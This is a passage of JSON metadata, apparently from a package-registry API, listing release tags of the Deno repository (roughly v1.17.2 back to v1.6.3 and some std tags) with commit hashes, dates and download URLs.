eload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/